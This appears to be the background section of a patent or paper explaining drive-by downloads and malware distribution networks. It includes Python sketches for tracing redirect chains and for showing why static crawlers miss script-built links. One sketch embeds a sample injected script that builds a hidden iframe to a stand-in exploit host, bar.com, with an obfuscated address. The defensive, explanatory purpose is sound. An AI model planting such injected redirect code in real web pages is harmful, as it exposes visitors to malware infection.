The reach and scale of the Internet have fostered a parasitic industry of those who seek to profit illegally and/or unethically. A common strategy for profiting illegally is to infect the computers of users with malicious code (malware) that can be employed to obtain passwords, transmit spam, retrieve contact lists, participate in a botnet, etc. To successfully infect a machine (and thus to successfully profit), an author of malware needs the following: malicious code that is intended to execute on a computing device, a manner to cause the malicious code to execute on the computing device, and an introduction to a user upon whose computing device the malicious code is to execute. Authors of malware often find that obtaining introductions to users and causing malicious code to execute on their respective machines is a much greater challenge than the actual construction of the malicious code. An exemplary approach that distributors of malware have employed is social engineering, which is the process of using false pretenses to lure a user into installing malicious code on a machine of the user. In this approach, the introduction to the user is often obtained through spam.
Another exemplary approach to cause malicious code to execute on a computing device of a user is the exploitation of unpatched vulnerabilities in an application resident on the computing device. A drive-by download is one particular example of this approach, where the application whose unpatched vulnerabilities are exploited is a web browser. For instance, a vulnerability of a web browser can allow malicious code to execute on the machine of a user without knowledge or consent of the user (e.g., without the user confirming that the malicious code is to be downloaded). In this approach, when a user causes a vulnerable browser (one with unpatched vulnerabilities) to visit a malicious web page, the computing device upon which the browser is executing is infected with malicious code. For example, an author of malware can set up a web site that hosts malicious content and wait for users with vulnerable browsers to visit the web site. The number of computing devices that can be infected in this manner is directly related to the amount of traffic to the web site(s) set up by the malware author.
A more common approach undertaken by malicious attackers is to infect an unknowing (innocent) web site with code that directs a browser, when loading a web page from the web site, to load malware from some other site (e.g., through a series of redirects). From the perspective of the attacker, a particularly attractive aspect of this approach is that the attacker can piggyback on the traffic of the innocent site. Thus, the introduction of the attacker to the user is provided by web traffic that the site is already attracting. Typically, rather than defacing the innocent site or impairing its performance, the attacker injects a malicious script that is employed to (eventually) redirect the vulnerable browser of the user to a server hosting a malicious payload. Accordingly, a computing device of the user that possesses the targeted vulnerabilities will become infected with the malicious payload. The initial web page loaded by the browser is referred to as the landing page, and the site with the malicious payload is called the exploit server.
Oftentimes, the path from the landing page to the exploit server will include numerous redirects. In an example, if the attacker succeeds in infecting the web server at foo.com, the attacker can direct all traffic to load the malicious content from bar.com. This can be done indirectly, such that a page at foo.com points to a.com, which points to b.com, which points to c.com, and so on, until the traffic reaches bar.com. Often, many landing pages share a small collection of exploit servers. The landing pages may also share some nodes in their redirection paths to the exploit servers. The collection of landing pages, exploit servers, and redirect servers is known as a malware distribution network (MDN).
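The redirect structure described above can be pictured as a directed graph over hosts. The following is a minimal sketch of that view, not a description of any particular detection system: the host names foo.com, a.com, b.com, c.com, and bar.com come from the example above, while baz.com (a second landing page) and all function names are hypothetical and introduced purely for illustration.

```python
from collections import defaultdict

# Hypothetical redirect map: each host points to the host it redirects to.
# baz.com is an assumed second landing page that joins the chain at b.com.
REDIRECTS = {
    "foo.com": "a.com",
    "a.com": "b.com",
    "b.com": "c.com",
    "c.com": "bar.com",
    "baz.com": "b.com",
}


def redirect_path(landing_page, redirects, max_hops=20):
    """Follow redirects from a landing page until a host with no outgoing redirect."""
    path = [landing_page]
    seen = {landing_page}
    current = landing_page
    while current in redirects and len(path) <= max_hops:
        current = redirects[current]
        if current in seen:  # guard against redirect loops
            break
        path.append(current)
        seen.add(current)
    return path


def group_by_exploit_server(landing_pages, redirects):
    """Map each terminal host (treated here as the exploit server) to its landing pages."""
    groups = defaultdict(list)
    for page in landing_pages:
        groups[redirect_path(page, redirects)[-1]].append(page)
    return dict(groups)


def shared_redirect_nodes(page_a, page_b, redirects):
    """Return intermediate hosts that appear on both redirection paths."""
    inner_a = redirect_path(page_a, redirects)[1:-1]
    inner_b = set(redirect_path(page_b, redirects)[1:-1])
    return [host for host in inner_a if host in inner_b]


if __name__ == "__main__":
    print(redirect_path("foo.com", REDIRECTS))
    print(group_by_exploit_server(["foo.com", "baz.com"], REDIRECTS))
    print(shared_redirect_nodes("foo.com", "baz.com", REDIRECTS))
```

In this sketch the two landing pages resolve to the same terminal host and share the intermediate hosts b.com and c.com, which mirrors the observation that many landing pages can share exploit servers and portions of their redirection paths.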
Providers of web browsers generally attempt to quickly identify and patch vulnerabilities. Oftentimes, however, end users are not quick to update the browsers on their computing devices with appropriate patches. Search engines also attempt to identify web pages associated with malicious content, so that users of a respective search engine do not have their machines infected and subsequently stop using the search engine. The architecture of an MDN, however, makes the task of identifying infected landing pages, redirect servers, and exploit servers very difficult. This is at least partially because static crawlers, used by search engines to build their respective indexes, retrieve contents of web pages and do not execute any scripts that are coded into the web pages. Scripts are not executed because of the incredibly large number of web pages that search engines attempt to index, which is on the order of billions of web pages per day. Therefore, malicious actions performed by scripts on a landing page are largely invisible to static crawlers employed by search engines.
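The limitation of static crawling can be illustrated with a small sketch. It assumes a crawler that only parses markup and collects `href` and `src` attributes; the page content, the class name `StaticLinkExtractor`, and the function `static_urls` are hypothetical, and actual search-engine crawlers are not described in this document. The injected script assembles the address of the exploit server (bar.com, from the earlier example) at run time, so the address never appears in the static markup.

```python
from html.parser import HTMLParser

# Hypothetical landing page: one ordinary link plus an injected script that
# builds the exploit-server URL only when the script is executed by a browser.
LANDING_PAGE = """
<html><body>
<a href="http://foo.com/about">About</a>
<script>
var f = document.createElement("iframe");
f.src = "http://" + ["bar", "com"].join(".");
document.body.appendChild(f);
</script>
</body></html>
"""


class StaticLinkExtractor(HTMLParser):
    """Collect href/src attribute values from markup without running scripts."""

    def __init__(self):
        super().__init__()
        self.urls = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name in ("href", "src") and value:
                self.urls.append(value)


def static_urls(html):
    """Return the URLs that a markup-only pass over the page can observe."""
    parser = StaticLinkExtractor()
    parser.feed(html)
    parser.close()
    return parser.urls


if __name__ == "__main__":
    # Only the ordinary link is reported; the script-built URL is not.
    print(static_urls(LANDING_PAGE))
```

Because the script body is treated as opaque text, the markup-only pass reports the ordinary link to foo.com but has no way to observe that a browser executing the script would be directed to bar.com.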